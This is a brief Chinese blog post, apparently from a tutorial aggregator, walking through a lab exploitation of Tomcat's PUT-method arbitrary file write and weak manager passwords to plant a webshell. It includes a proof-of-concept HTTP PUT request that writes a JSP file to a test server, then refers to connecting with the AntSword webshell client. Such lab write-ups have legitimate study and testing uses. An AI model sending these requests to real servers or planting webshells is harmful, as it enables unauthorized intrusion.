tomcat put方法任意写文件漏洞、弱口令并进行挂马

2022/4/18 6:15:09

本文主要是介绍tomcat put方法任意写文件漏洞、弱口令并进行挂马,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

 

 

POC
直接发送以下数据包,然后将外壳程序写入Web根目录。

PUT /1.jsp/ HTTP/1.1

Host: 192.168.52.154:8080

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 5

 

shell

 

 

 

通过弱口令漏洞进行登录

 

 

 

 

 

 

 

通过蚁剑进行连接

 

 

连接成功

 



这篇关于tomcat put方法任意写文件漏洞、弱口令并进行挂马的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程